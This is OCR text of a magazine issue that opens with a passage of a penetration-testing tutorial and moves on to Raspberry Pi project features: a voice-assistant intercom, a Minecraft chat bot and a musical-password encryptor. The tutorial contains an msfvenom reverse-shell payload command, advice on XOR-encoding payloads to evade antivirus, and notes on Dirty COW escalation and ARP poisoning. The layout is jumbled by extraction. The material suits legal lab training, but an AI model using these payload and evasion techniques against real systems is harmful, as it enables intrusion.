comes to security tools and scripts – so get used to it.
You should be able to fix these issues by making some
code changes; whenever in a hurry, though, just choose
another tool or write your own.
Now that you have some valid user names, get some
huge password lists from and use
them in your brute-force password attacks. Good tools to
perform brute-force attacks are Hydra and Patator (both
included in Kali). These are great utilities to attack wellknown services such as SMTP, SSH and FTP. As a pentester, it won’t always be that easy, though. You must be
prepared to code your own brute-force scripts for custom
or in-house developments. We suggest you use Python
because it is very easy to write something that works in
no time. The same goes for user-enumeration. A common
approach would undoubtedly be to guess a user’s
password by means of trying the same username each
time with a different password; however, sometimes it’s
better to do the opposite: use the same password each
time with a list of different usernames. Many users will
share the same password, although they don’t know it!
Keep looking for services vulnerable to user
enumeration. Content management systems (CMSes)
and learning management systems (LMSes) are good
candidates. If you happen to locate a web server on
the target’s network that is running some sort of CMS,
then try to get a list of its users. Wpscan is a good tool
A real pen-testing engagement
Information Gathering
We are provided with the
company’s network address. We use
Censys ( to have a quick
look at those servers accessible from
the internet first. We are working from
outside the company’s network, operating
as a Black Hat with no foothold into the
network. Censys shows us a bunch of
hosts, one of them running a web server
tagged as ‘HeartBleed’.
Threat Modelling
During the Threat Modelling stage,
we consider the following vector attack:
exploiting the HeartBleed bug to pilfer
some sensible data out of the web server.
This way, we may be able to grab some
credentials or authentication cookies.
We have not yet tested for the vulnerability;
we are just considering different attack
vectors, and this is the first one that comes
to mind because of its simplicity.
Vulnerability Assessment
During the VA stage, we run
some tests using OpenVAS and Nessus in
order to determine if the hosts reported
by Censys and their services have wellknown vulnerabilities. We do know that
one web server, apparently, is vulnerable
to HeartBleed, but we want to make sure
there are no more issues. We confirm the
HeartBleed bug using Metasploit. This web
server is also running OpenSSH.
for enumerating WordPress users. Focus your efforts
on enumerating installed plug-ins as well (they tend to
be buggy).
During the Vulnerability Assessment stage, you
could run a vulnerability scanner such as OpenVAS
(, Nessus (
or Nexpose ( But they are too
noisy and only as good as their knowledge base. When
dealing with huge infrastructures or whenever running
on a tight schedule, they are a good option to consider
though: the most obvious vulnerabilities are going to be
detected, probably. However, if you have collected a good
Some security tools
will work out-of-the-box
whereas others won’t
deal of services, banners and software versions, you
can skip these scanners (almost) entirely. Use ‘Vulners
vulnerability database’ instead!
So, let’s imagine you have found a Secure Shell server
on the target network thanks to nmap: ‘banner: SSH-2.0OpenSSH_4.3p1 Debian-9etch3’. You do know this is a
GNU/Linux computer running Debian Etch with OpenSSH
server 4.3.p1. Navigate to Vulners (
and look for potential OpenSSH vulnerabilities; type
bulletinFamily:exploit AND OpenSSH into the search
The fun stuff comes during
the Exploitation stage. We execute the
Metasploit module ‘auxiliary/scanner/ssl/
openssl_heartbleed’ in ‘DUMP’ mode in a
loop in order to extract some data from the
server. We gather lots of information and a
few hours later we proceed to filter it out.
Using grep and some regular expressions,
we bump into our first credential! Now we
can try to move laterally on the network.
box and press Enter. Among all the results, you will see
a Denial Of Service (DoS) vulnerability. If you follow the
link (, you will
get additional resources and information such as: which
vulnerability scanners detect it (e.g., here we see that
both Nessus and OpenVAS detect this vulnerability), a
public exploit hosted on ExploitDB, and references to
reported security bulletins by some GNU/Linux distros.
Vulners is really useful because you do not need
to run a security scanner against your target with all
the noise and issues that this could entail; instead,
you can grab banners and versions during the active
discovery step and later on look for well-known
vulnerabilities and public exploits there. You can add
Vulners lookups in your own scripts thanks to its API
Next, we establish an SSH
connection to the web server using our
first credential. We do not have superuser
privileges yet, but we find out that this
server is running a kernel vulnerable
to Dirty COW. So we exploit this bug,
overwriting a setuid root file (/usr/bin/X)
with a reverse root shell connecting back to
our computer; from here we create a new
user with sudo privileges.
Above There's no need
to be noisy; Vulners
database is a great tool
to look up well-known
vulnerabilities and
it’s free to use!
We conclude the engagement by
writing a couple of reports; the executive
one will give a high overview of this
finding (along with any others), whereas
the technical one should describe all
the steps performed in order to set a
foothold into the system. We include
ways of patching the vulnerabilities
detected along with a list of good
practices and recommendations.
Top pen-testing techniques
Pen-testing is
not an exact
science; so get
used to going
back and forth
on its different
stages. Make
heavy use of
lateral thinking
and try things
that have worked
for you in the
past first.
Right Remember the
notorious website
PleaseRobMe? Well,
Tinfoleaks can help
you track down a
particular user during the
information gathering
stage, too
as well. One tool that leverages Vulners API is getsploit:
git clone
Use it to download public exploits for, say, Samba 2.2:
./getsploit -m samba 2.2. Another interesting project
is Vulners-scanner (;
if you get access to a target computer, execute this
host scanner locally in order to enumerate possible
vulnerabilities: ./
Post-exploitation and network attacks
Exploitation stage
Now is when the fun really begins: you have spotted a
bunch of services that are apparently vulnerable. Vulners
has reported to you that there is a public exploit. You
then proceed to download this exploit in order to execute
it against the target, hoping that the vulnerability will
be successfully exploited. Wrong! Long before executing
any exploit against a target, you need to read it and
understand what it really does [see Tutorials, p38,
LU&D174]. Install the very same service as the target on
a virtual machine in your lab, whenever feasible, and try
the exploit there first. Look for exploits in the Metasploit
Framework ( in the first place.
If there is no public exploit, read all the security bulletins
carefully in order to understand the issue and try to code
your own PoC; test it against your VM first.
It’s not always about well-known vulnerabilities,
though. Sometimes the flaws may reside within
an in-house development. This is fairly common
on websites. For such cases, learn about the ten
common vulnerabilities affecting web applications
( Web hacking has
become a big trend as it's easier to exploit poorly thought
out web applications than trying to exploit the web
server itself. Let’s imagine you have found a web server
running on the target’s network. According to its banner,
it’s an Apache Server 2.2.16 running PHP You
Among all the tools and techniques available
to any pen-tester, some network attacks are
routinely performed once they have control of a
target during the post-exploitation stage. You can
deploy ARP (Address Resolution Protocol) poisoning
attacks in order to intercept and even manipulate
traffic from and to hosts; this sort of attack is
usually combined with DNS spoofing and is also
known as man-in-the-middle (MITM). Use Ettercap
( to automate
and perform this sort of attack. Traffic capture is
also common: you can use a tool such as Xplico
( to capture the
application data contained within traffic (such as
images, emails using POP or IMAP protocols, VoIP
calls and so on).
look for well-known vulnerabilities and you find this: But maybe this
won’t work as PHP isn’t configured to work as CGI on the
web server. Time to analyse the web application, then.
You are dealing with an in-house development you
don’t know anything about, so you can proceed by
testing the Top 10 common issues of web applications.
Nikto is a good open source web scanner (included in
Kali). Focus on user-input fields: maybe there’s an SQL
injection flaw there? Anyway, you will need to be fluent
in creating scripts and payloads; Metasploit will not
always have what you need out-of-the-box. Let’s imagine
that you have found a web application that allows you to
upload a file whose extension is either JPG, PNG or GIF.
This application runs on a Windows server. You first try
Kali Linux
This distro is Debian-based and a rolling distro,
which means you have updates every day. It's
meant for regular computer installs for performing
pen-testing engagements and/or forensics.
to upload a PE binary and fail; time to use a web proxy
(Burp Suite or ZAP!, both included in Kali). Using a proxy,
you can intercept any POST or GET request before it is
actually sent to the web server, but right after all the
client-code has been executed. This way you can alter
any parameter and analyse the server’s behaviour by
means of processing its responses. This is a well-known
trick to bypass most of the controls set in place in
client-code. In addition, Burp Suite allows you to actively
engage with the server in order to detect potential SQL
injections among other vulnerabilities from the Top 10.
Don’t do that unless you are on a really tight schedule:
you cannot know beforehand what could happen to the
web application – or the web server, for that matter.
When you are uploading binary files to a target, the
chances are that some antivirus can detect your binary
as malicious. Try it: create a new reverse_tcp shell for
Windows 32-bit using msfvenom: msfvenom -a x86
the detail
Tools are great,
but don’t rely
solely on them;
you need to
understand the
nuts and bolts
of the issues
you are facing,
you will be no
different than
any guy running
a vulnerability
--platform windows -p windows/meterpreter/
Web hacking has become
a big trend as it's easier to
exploit poorly thought out
web applications than the
server itself
reverse_tcp LHOST= -f exe -o
Meterpreter.exe. Now upload this file to VirusTotal
Parrot Security
Like Kali Linux, Parrot has a host of utilities
designed for pen testing. But it also has utilities
for computer forensics, reverse engineering,
hacking, privacy, anonymity and cryptography.
An Ubuntu-based distro, it can be used as a regular
pen-testing distro (such as Kali). Unlike Parrot,
though, you have to purchase its maker’s services if
you want to deploy it on the cloud.
( As of this writing, 50 out of 64
antiviruses have detected it as malicious. Get used to
encoding your payloads always to bypass anti-virus. You
can use strong encryption if you want; but most of the
time a ‘NULL-preserving single-byte XOR encoding’ will
do. You can write a trivial Python script that XOR every
byte in Meterpreter.exe with a secret key (get it from the
cover disc; it’s called Then, execute it: ./
Now upload the resulting file, Meterpreter.xored,
to VirusTotal. See? Of course, once uploaded to the
vulnerable server, don’t forget to decode it back!
During some of your engagements you may be able to
download a whole database with some usernames and
hashed passwords. That’s when the huge password lists
downloaded early on will come in handy! Try to paste
some hash into Google. Still no luck? Crack it! If you
don’t recognise a particular hash, use hash-identifier or
hashid first:
11 01101111 01110010 0
00 01101100 01101111 0
11 01101111 01001000 0
00 01100101 01101100
1 01110010 01101100 0
00 01001000 01100101
10 01101100 01100100 0
1 00100000 01010111 0
01 01101100 01101100 0
01 01101100 01101100 0
[+] Cisco-IOS(SHA-256)
[+] Cisco Type 4
Next, you can use hashcat (with GPU support to speed up
Stay in the
Keep an eye on
reported data
breaches and
get your hands
on any leaked
password list
published on
the internet; you
could use them
later on during
your dictionary
Top pen-testing techniques
the process) in order to crack them. You should begin with
a dictionary attack using all the passwords you already
have. You will be shocked by just how easy is to crack
a bunch of hashes using a dictionary and some simple
hashcat rules.
Put your skills to the test!
It’s time to get your hands dirty. We have set up a
Pen-testing Challenge for you. You will need to import
the VirtualBox appliance Linux User and Developer
Pentesting Exercise.ova from the cover disc (or download
it from FileSilo). Open VirtualBox and choose File > Import
Appliance. Choose the OVA file from the cover disc and
click the ‘Next’ button. Don’t make any changes to the
Appliance Settings window and just hit the ‘Import’
button. Wait until the appliance is imported. This VM uses
a host-only interface named vboxnet0. If you do not have
this virtual interface up, use VirtualBox to do so; go to
File > Preferences > Network > Host Only Networks and
make sure to create a new virtual device; the first one
should be named vboxnet0. Click the ‘OK’ button. Next,
go to the VM settings page, select the Network option
and check that the Cable Connected checkbox is enabled
on the Adapter 1 tab. Power on the VM and wait until it
has booted up completely. You will see a console login.
You are free to use
whatever tool or technique
that we have described
throughout this feature
This VM will get its TCP/IP settings from the VirtualBox
DHCP server; it should get the IP address;
use Wireshark or tcpdump while the VM is booting up to
capture the DHCP packets and see the actual IP address
given, in case you need it.
You are free to use whatever tool or technique that we
have described throughout this feature or others; but you
are not supposed to know anything beforehand about
this computer and you're not supposed to have physical
access to it. Of course, you can see a lot of information
scrolling down the VM screen; let’s pretend you can’t.
That said, are you for the challenge?
The pen-testing challenge
You have been hired as a pen-tester to assess the
security of one particular serve. You have been provided
with the following details:
• You are meant to take a black-box approach.
• You cannot engage with other systems/computers
running on the company.
• You cannot perform social engineering attacks.
• They want you to assess the security of this computer
and determine if it is feasible to gain a root shell.
Get trained
Learning about pen-testing is awesome; but doing
so by engaging with real systems is illegal (unless, of
course, you own them). Even so, you can break them.
That’s why there’s a bunch of GNU/Linux distros
and software especially designed to be vulnerable:
Metasploitable3 (
is meant for testing Metasploit and Web Security
Dojo ( has been designed to
test your web pen-testing skills. Navigate to in order to learn about
some particular vulnerabilities and ways of
exploiting them (some of these exercises are for
free and include an ISO that you can download).
SickOs 1.1 ( is another distro
that’s worth a look and some write-ups are starting
to appear here:
• You are provided with the IP address of the server to
Tips & tricks
There may be different ways to solve this pen-testing
challenge. If you get stuck, there’s a possible step-bystep solution on the cover disc (Feature_Pentesting_
Exercise_tcg.pdf) and FileSilo. What follows is a guide
that can help you with the challenge:
1. Information Gathering: Start by jumping to the
fingerprinting step (no need to gather intel using OSINT
techniques for this challenge). Tools: nmap.
2. Threat Modelling: Focus your attention on feasible
attack vectors, the simpler the better. Tip: in-house
development common vulnerability?
3. Vulnerability Assessment: Look up well-known
vulnerabilities for detected software versions. Tools:
Vulners, OpenVAS, Nessus.
4. Exploiting: Try the simplest vulnerabilities first. Tip:
try bypassing some client control checks on in-house
developments. Learn to adapt your attack to the current
engagement: not every pen-test is alike. Be creative.
Tools: Burp Suite or ZAP Proxy and some UNIX tools: cat,
dd, nc…
5. Post-exploitation: Escalate privileges by exploiting
well-known vulnerabilities – old setuid binaries or some
kernel bug. Tools: public exploit written in C plus some
reverse shell created with msfvenom.
As an additional challenge, once you have been able to
gain a root shell on the target computer, you could code
your own exploit. This exploit could be adapted, later on,
to work as a module for Metasploit (see
BuildModule). Try harder and… happy hacking!
S 7
D 201
The spring superblooms
that take over the desert
From 160-day heatwaves to a
tornado wider than a town
How chefs use science to
create innovative dishes
The discoveries leading
the fight against disease
Getting hands-on
with the virtual world
(€69.90 /$77.40 PER YEAR)
(€85 / $85 PER YEAR)
(€81 /$113 PER YEAR)
(€103 / $105 PER YEAR)
& why we loveNthem
The bald
the hairle
this guciay!lly
The Chino
from river ok salmon’s
epic trip
to ocean
and back
world of yourself in the FEATHER
the jellyfi
The mos
plumaget beautiful
on Earth
Join the
plastic pollu
tion in ourn to end
UNTIL 10/26/17
US $9.99
CAN $9.99
Why the
mantis is
Meet the HOUSE
hiding in
your hom
17 10:37
(€78 / $108 PER YEAR)
(€72 /$72 PER YEAR)
Delivery included in the price
Free personalised e-card when buying for someone else
Buy as a gift or treat yourself!
Choose from a huge range of titles
ORDER HOTLINE: 0344 848 2852
Terms and conditions: Savings calculated against the full RRP (single issue price x frequency). Dollar prices quoted are for the United States, other global territory dollar pricing may vary. This offer is for new subscribers only. You can write to use or call us
to cancel your subscription within 14 days of purchase. Your subscription is for the minimum speciied and will expire at the end of the current term. Payment is non-refundable after the 14 day cancellation period unless exceptional circumstances apply.
Your statutory rights are not affected. Prices correct at point of print and subject to change. Full details of the Direct Debit guarantee are available on request. For full term and conditions please visit: Offer ends 31st December 2017.
Raspberry Pi
“A wallmounted
Google Voice
Assistant housed in
a 1986 intercom”
Create a chat bot
in Minecraft
Encode your secrets
using musical notes
Detect things that go
bump in the night
Measure the Earth’s
shape with PyGeodesy
Google Pi Intercom
Google Pi Intercom
The launch of the Google AIY Kit enabled the creation of an
intercom that answers questions and follows commands
projects using the Alexa technology and a couple of other
projects, [including] a talking rabbit, I did with Alexa. I
just really like it. There’s something about it and it’s really
interesting to see how the kids interact with it as well as
they have much more open minds than we have about
the ways things are done. They ask it things that I would
never think of asking, so it’s interesting.
Works as an analyst
in Intelligence and
Analytics at Norfolk
County Council
and has a passion
for combining new
technology with
vintage design.
Like it?
If you want to
experience Pi
inspired cuteness,
you’ll want to take
a look at Martin’s
talking rabbit
project at http:// As
well as answering
queries via Alexa,
this creature can
be commanded
to do many things
including start a
laser show, play
music and even take
selfies and upload
them to Twitter – all
while waggling its
cute little ears.
For the blow-byblow account of
Martin’s adventure
building this retro
Google Assistant
intercom head to
its Instructables
When Martin Mander heard that a Google AIY (Artificial
Intelligence Yourself) Voice Kit was going to be free with
an issue of The MagPi, the Raspberry Pi Foundation’s
official magazine, it prompted a lunchtime dash to the
newsagents to snag one for his next project. It wasn’t
long before he hit on the idea of a wall-mounted Google
Voice Assistant housed in a 1986 intercom. The AIY Voice
Kit uses the power of Google Natural Language combined
with a Voice HAT and other components – although
you’ll need to buy a Raspberry Pi 3 – to create a DIY
Google Home device. Since this project was completed,
the popularity of the AIY kit has meant it’s gone into
full manufacture and you can now pre-order kits from
Pi Hut ( and Pimoroni
( in the UK for £25 and
from Micro Center (
in the USA for $25. The Foundation says that the new
kits are even easier to assemble and easier to code for
because of an improved API.
What projects interest you?
What I mostly do is retro conversions. We go to the car
boot sales at the weekend and we’re always on the
lookout for anything unique or has a really good look
to it, not matter what it is; it could be any kind of thing
really – TVs, radios and that sort of thing. But it has to be
something that I really like and then that gets stored and
usually later on I think about what to do with it. That’s
what I’m passionate about: using new technology to bring
life back to obsolete electronics.
You seem to like the voice control side of things. Is this
something you’ve been doing for a while?
Yes, I think the year that Amazon released their code for
the Raspberry Pi []. I was keen to get into
that straight away. I did the Alexa phone project just over
a year ago. I think that was one of the first published
What do you think of the Voice HAT?
As a kit I thought it was really good. I would class myself
as intermediate to advanced, [but] if it was somebody
just picking it off the shelf, they could take it home and
make it. All they need is a Pi, they don’t need a soldering
iron, they didn’t need anything fancy to put it together.
That’s what surprised me – I thought there was going to
be at least some soldering but no, it clipped together. The
quality of the components seemed good and what I’m
starting to think about now is soldering in some of those
headers and getting some GPIO control on there – the
more advanced person is happy to do a bit of soldering. I
think they pitched the kit just right because if you want to
do more fancy stuff you can, but equally, in its own right,
you can just have a weekend and do a project and have
fun without being a specialist.
Are there any compromises that you made? Would you
approach the project different now you’ve finished?
[Laughs] Yeah, I made one mistake which was putting it
together and I had to reflash it just before I assembled it
and when I reflashed it I didn’t re-enable SSH. It’s in the
case now, but I can’t get at it without taking it apart.
I think, in retrospect, I would have had a closer look at
the code. There was someone from Google who sent me
an email saying ‘did you see that you can this, this and
this? Edit this one script.’ Oh no, I wish I’d had a look at
those scripts and maybe changed the voice to GB voice
instead of the American one. Changed the localisation,
because it reads out temperatures in Fahrenheit at the
moment. There are a few lines in the script that you can
change for that and also the wake word activation. So you
can say “Intercom, when’s my next?” whatever and you’d
be able to do that.
Have you got any other projects in mind after this one?
I really want to build a robot. I’ve never built a robot, when
I did the talking rabbit it had little servos that moved its
ears when it got a notification through and that was really
interesting, but to make something that trundles around
the house and does something purposeful with voice
control in it. That’s the main idea, but I want to find the
right case for it. My boss has an old K-9 up in his loft –
the K-9 has been done, but a robot is definitely next.
Components list
n Raspberry Pi 3
n Mid-1980s FM intercom
n 2.3-inch Visaton FR58
8-ohm full-range speaker
n Voice HAT accessory
n Voice HAT microphone
n Switch from arcade-style
push button
n 4-wire button cable
n 5-wire daughter board
Tight mic
Snug speaker
The speaker from
the AIY Voice Kit is
3 inches and wasn’t
going to fit in the
intercom case, so
Martin needed to
find an alternative
that was as sturdy
and as good quality
– that turned out to
be a 2.3-inch Visaton
FR58 8-ohm fullrange speaker.
The microphone in the AIY Voice Kit sits on its own board and
turned out to be a “natural fit” for the top of the intercom
case. By placing it here, Martin was able to put the Raspberry
Pi 3 at the grille end, although he wasn’t able to expose the
HDMI port having the Pi in that position.
Switch to talk
To keep that retro feel, Martin
retained the original travel of the
intercom’s ‘talk’ button. He did this
by making sure the switch from the
kit was held in the right place by a
retaining screw that also fixed the
hinged button in place. In a stroke
of good fortune, he was able to
use an existing screw-hole for this
important job.
Google juice
In Martin’s video (,
he and his 10-year-old daughter demonstrate
how they used the AIY Voice Kit to set up their
Google Assistant that you can activate with a
click of a ‘talk’ button. The intercom has also
been used to set up custom voice commands
that trigger the lights of a doll’s house and disco
lights by activating a WeMo smart socket. The
code for the AIY Voice Kit has been updated
in significant ways since Martin finished his
intercom project and you can change a few lines
of code to activate the Assistant by pressing a
button, clapping your hands or just saying ‘OK
Google’ to trigger a device’s listening mode.
Above To integrate the Pi-powered intercom
with as many smart devices as possible in his
home, Martin used IFTTT (If This Then That) to pair
together triggers and actions from various online
services that he’d added to his IFTTT account.
He says, “Google Assistant seems more flexible
than Alexa for this, as you can configure multiple
‘trigger’ phrases [...] and customise the response
that the assistant will read out”
Above Putting the intercom together involved a lucky break: Martin says that had the case “been
even 5mm smaller in any direction it just wouldn’t have worked”. As it was, he had to trim away plastic
protrusions inside the case, such as posts, with a rotary tool to make sure all the components fitted
Create a chat bot in Minecraft
on the Raspberry Pi
is head of
computing and
network manager
at an all-through
state school.
in Computer
Science, Calvin
also consults with
schools all over
London, helping
provide highquality teaching
and learning in
Block IDs
Angry IP Scanner
Tutorial files
Program your Raspberry Pi using Python to read a chat script
directly from a text file into Minecraft
Open the newly created files in your favourite text editor.
All of this can be done from Terminal, if you use nano, Vim
or Emacs.
Using some basic Python code, we’re going to read and
write directly from text files saved on your computer
into your Minecraft world. Steve (or Alex) will be chatting
in game from a pre-written script. This simple chat bot
could have all kinds of applications – as with all things
Minecraft, the limit is your own imagination!
This tutorial is written with Minecraft Pi Edition in
mind, but you don’t have to be running Minecraft on a
Raspberry Pi to follow along. We’ve put together a little
package that will work on any version of Minecraft, so
if you would like to run this tutorial on your favourite
flavour of desktop Linux, Pi or no Pi, you can do. To allow
Python to hook into Minecraft, you’ll need to install
McPiFoMo (link available in the Resources section) by
extracting the contents of the .minecraft directory into
~/home/.minecraft. McPiFoMo includes MCPiPy from and Raspberry Jam, developed by Alexander
Pruss. Provided you have Python installed, which of
course comes installed as standard on most distros, no
additional software is required, other than your favourite
text editor or Python IDLE.
Python scripts in this tutorial should always be saved
in ~/home/.minecraft/mcpipy/, regardless of whether
you’re running Minecraft Pi Edition or Linux Minecraft. Be
sure to run Minecraft with the ‘Forge 1.8’ profile included
in McPiFoMo for your scripts to run correctly.
Program your script
Start off the code in your file by
importing the Minecraft libraries into Python, initiating an
instance of Minecraft within a variable (mc) and opening
the text file in read-only mode ("r") within another
variable (mcScript).
from mc import *
mc = Minecraft()
mcScript = open("script.txt", "r")
Read, write and append text files in
If you wouldd like to call from a text file outside of the
mcpipy directory where your Python file is located, you
can do so with:
mcScript = open("~/.minecraft/mcpipy/script.
txt", "r+")
You’ll also notice we’re using "r+" instead of "r" this time.
The available modes for editing text files are: append (a),
read (r), and read+write (r+).
Write to your script with Python
As with any programming tutorial, we start off by
printing ‘Hello World!’:
Set up your dialogue
We’ll want to create two empty documents for
this tutorial, one being a regular text file and the other
an empty Python script. You can do this in a Terminal
window with the following commands:
touch ~/.minecraft /mcpipy/script.txt
touch ~/.minecraft /mcpipy/
mcScript = open("~/.minecraft/mcpipy/script.
txt", "r+")
mcScript.write("Hello World")
Here we’re opening the file in read+write mode, saving a
string to the file and closing it. It’s important to note that
text files will only save if closed.
Display your script in-game
Now that we’ve got something written in our text
file, we can ‘print’ our scripts in-game:
mcScript = open("~/.minecraft/mcpipy/script.
txt", "r+")
you may want to write text back to the script file:
with open("script.txt", "w") as mcScript:
mcScript .write("Strings" + Variables)
Here we can save strings and/or variables directly into the
text file. If you’re using with, you don’t need to remember
to mcScript.close() – it will save automatically.
Combine chat bots with previous projects
Where this gets really interesting is when you
use text scripts for commands instead of dialogue. Take
our pixel art code from issue 181; you could call a text
file from the pixelArt variable instead of hard-writing
numbers into the code.
pixelArt = mcScript .readline()
You can now change the pixel art every time by adjusting
a line in the text file, without altering the Python code.
Note that we’re using the postToChat action from our
mc instance, rather than print, and we’re posting the
contents of a variable instead of a string.
Read directly into your world
You can use the traditional print command to
read text into your game world. The following code will
read the first line of your text file.
mcScript = open("~/.minecraft/mcpipy/script.
txt", "r+")
print mcScript .readline()
Add a few more lines to script.txt after ‘Hello World’.
Perhaps create some dialogue for an NPC.
Rehearse multiple lines at a time
You’ll probably want to post several lines of
dialogue into your game at a time, especially if you’re
creating a bot of some kind. This will post line-by-line:
mcScript = open("~/.minecraft/mcpipy/script.
txt", "r+")
print mcScript .readline()
print mcScript .readline()
print mcScript .readline()
Read out your script with a loop
The previous step will only read the first three
lines. That might be useful if you only want your NPC to
say so many things at once, but you can create a for loop
to read the entire document line-by-line, too:
for line in mcScript.readline():
print line
Write and autosave
Python and Minecraft Pi
Using Python, we can hook directly into Minecraft Pi
to perform complex calculations, alter the location
of our player character and spawn blocks. We can do
pretty much anything from creating prefabricated
pixel art, to communicating directly with the player.
In this issue we read and write directly to text files
to create a non-player character script that can be
printed to the chat display in-game.
With each issue of LU&D we take a deeper look
into coding Python for Minecraft Pi, with the aims
of both improving our Python programming skills
and gaining a better understanding of what goes on
underneath the hood of everyone’s favourite voxelbased videogame.
Depending on what kind of bot you’re creating,
Piano HAT
Make musical passwords
Mozart meets Moonraker with a Pi project for musically
encoding your secrets using Pimoroni’s Piano HAT
is a technology
specialising in
cybersecurity and
retro tech.
Piano HAT
Tutorial files
The Pimoroni Piano HAT is an extraordinarily useful
board that can turn your Raspberry Pi into an electronic
keyboard. The keys are responsive to touch and each
one has an LED which can light up as you play. Pimoroni
has thoughtfully compiled an excellent library of coding
samples for your Pi which enable you to crank out tunes
within minutes of receiving your Piano HAT.
In this project we will talk you through the basics of
attaching the Piano HAT to your Pi, as well as how to use
it to generate 8-bit tones and play back piano and drum
sounds. You will then learn to use the custom ‘pianohatpassword’ Python scripts to encode a secret message
using musical notes. The first script,,
allows you to record a musical password by playing
a few notes, then invites you to enter some text you
wish to hide, such as a password or email address.
Use the second script,, to decode your
hidden secret.
Set up your Pi and add Piano HAT
This guide requires a clean install of the latest
version of Raspbian on your Pi. The easiest way to ensure
this is to visit and follow the
steps to install NOOBS to your microSD card. Once the
installation is complete, run sudo apt-get update
and sudo apt-get upgrade to bring Raspbian fully up
to date.
The Piano HAT itself is very easy to install. Marry up the
Pi’s GPIO pins to the connector on the HAT. The Piano HAT
is compatible with all models of Raspberry Pi; however,
if you have a Pi Zero or Zero W, you will need to attach a
male GPIO header yourself.
Download installation scripts
Open a Terminal window on your Pi, or connect
via SSH, and run the command:
curl | bash
Read the message about I2C and press Y to continue. The
installer will then ask if you wish to install the Piano HAT
samples. Press Y to confirm you wish to do this too, as
you can use these to check the Piano HAT is working later.
Installing the samples also downloads some of the
Python modules you will need to use the Piano scripts,
such as NumPy.
If successful, the installer will display the message: ‘All
done, enjoy your Piano HAT!’
Test 8-bit synth keyboard
If you chose to download the Piano HAT samples
in the previous step, there is now a folder named
Pimoroni in your home folder containing some example
scripts you can work with.
Connect a speaker or a pair of earphones to the Pi.
Next, using Terminal, run the following command to
transform your Pi into an 8-bit synthesizer:
sudo python /home/pi/Pimoroni/pianohat/
Download pianohat-password
Now that you’re satisfied the Piano HAT is
working correctly and understand its basic workings, it’s
time to download pianohat-password, which is a modified
version of the example script
Open a Terminal on your Pi and run:
git clone
Alternatively, copy the necessary scripts over from the
LU&D cover disc or FileSilo. If you do so, don’t forget to
place the sounds folder in the same folder as the scripts
in order to hear tones as you play.
Before proceeding, run the following commands to
install the required software for encryption:
sudo apt-get install build-essential libfidev
sudo pip install bcrypt pcrypto
Press a few keys to ‘make beautiful music’. These tones
are generated using the Pygame module, specifically the
make_sound method to create 8-bit tones with their own
frequency, bitrate and sample rates.
Review password entry
Open your File Explorer and navigate to the new
folder named pianohat-password. Right-click on the
script, then open it using either the
Thonny IDE or the Text Editor.
Test simple piano and drums
When you tire of tinny 8-bit tones, press Ctrl+C
and run another example Piano script:
sudo python /home/pi/Pimoroni/pianohat/
When the script runs, it asks you to play the notes that
will appear on your keyboard. The ‘Instrument’ button
now launches the procedure conirm_password.
The value irstpw is a list, which is used provisionally
to store the password as you play. Scroll down to the
procedure handle_note. Each time a key is pressed, the
relevant number (channel) is displayed and this value is
added to the list irstpw.
Review password input
Next, scroll down to the procedure named
conirm_password. This procedure is launched when
This script uses a series of WAV files to play a series of
piano notes or drum beats (use the ‘Instrument’ key to
switch between the two).
Use Ctrl+C to quit the script, then locate it in the file
browser. Right-click to open it with Thonny IDE.
As you will see, the script runs a procedure each
time one of the 16 buttons on the Piano HAT keyboard
is pressed. Piano keys are numbered according to
note and octave. For instance, the first octave of C is
numbered 24.
the user presses the ‘Instrument’ button to submit
the password.
In the first instance, the script will display the numeric
equivalents to the keys. The for loop is used to play back
the tones via the speaker every 0.7 seconds, to ensure
you remember them.
If you are serious about security, you may well prefer
to use a # to comment out these lines, since it’s generally
a bad idea security-wise to show your password in
‘plain’ text.
Piano HAT
MD5 hash
The password is then converted from a list (irstpw) to
a string (strpw), in preparation for it being hashed.
inclined readers may
have noticed that
the piano password
script generates an
MD5 hash of the
musical password.
This doesn’t improve
security but does
mean that the
password is exactly
16 bytes long, which
is required for
AES encryption.
Review password hashing
Review text encoding
Once the key tone password has been converted
to a string, the piano-password script generates an MD5
hash of it. This MD5 hash in turn is then converted to yet
another hash using bcrypt. The advantage of doing things
this way is that bcrypt automatically uses a unique ‘salt’
when encoding passwords. This makes it highly unlikely
that anyone who chooses the same musical password as
you will have exactly the same hash.
This also means, however, that each bcrypt hash is
unique, so the script saves it to a hidden file named
.pianohash. Feel free to change the filename and location
if you wish.
Once the password has been saved, the
piano-password script launches the encode_text
procedure. This makes use of the PyCrypto module. The
raw_input value (now simply input in Python 3) prompts
you as the user to enter your secret data.
The encryption algorithm used is AES, which works
on 16-byte (128-bit) blocks of data. The encode_text
procedure uses a while loop to pad out the text. If you
wish to change the scheme used, you may need to
edit this.
The text you input is saved to a hidden file named
.pianovault in the same folder as the piano-password
script. Feel free to change this if you wish.
Review text decryption
The decode_text procedure firstly loads your
encrypted data from .pianovault. If you’ve decided to
change the location or name of the file holding your
encoded text in the piano-password script, make sure to
change it here too.
The beauty of AES encryption is that it’s symmetric
– the same password used to encode data can be used
to decode it. Here the procedure simply takes the key
tones that you inputted earlier and displays them via the
Terminal window.
Both the .pianohash and .pianovault files are opened
as read-only to make sure the data isn’t corrupted. If you
want to make changes during runtime, change the option
r to w+.
Create your first musical password
Having got your hands dirty with the Python code,
exit Thonny or your Text Editor and open Terminal. Make
sure your speaker or headphones are connected and run
the piano-password script with:
sudo python pianohat-password/piano-password.
Review password confirmation
Close down the script and
open using the Thonny IDE or the Text
Editor. This script allows you to input your previously
chosen musical password and decrypt the text stored
in .pianovault.
The script works similarly to the ‘password’ program
in that it will ask you to key in your notes and display
them as you type. The ‘Instrument’ key is used to
confirm you’ve entered the password, at which point the
procedure conirm_password is launched.
This procedure essentially works in reverse to
encode_text. The script loads the hashed password and
compares it to the notes you’ve input. If successful, it
launches the procedure decode_text.
The script will welcome you and ask you to use your
notes. Remember, you can move up or down an octave
using the buttons below the ‘Instrument’ button.
In the example, we’ve used the five-note motif from
Close Encounters of the Third Kind: G, A, F, (octave lower)
F, C. Ideally, you should use an original tune that you can
remember easily. Make a note of the channel numbers on
paper as a backup.
Encode your message
Press the ‘Instrument’ key when you have finished
entering your tones. Your password will be printed to
the Terminal as a series of numbers corresponding to
button presses, as outlined above. The script will also
play back the tones to you and will go on to save a hash of
your password.
Now enter your secret text. There’s no real limit on
what this can be. Feel free to encode a password, a
message for a friend, or a weblink to a non-text file such
as an image.
When you have finished typing, simply press Return.
The script will report the encrypted text has been saved.
Decode your message
When ready to retrieve your data, reopen Terminal
on your Pi or connect via SSH and run:
sudo python pianohat-password/
Play your musical password, then press the ‘Instrument’
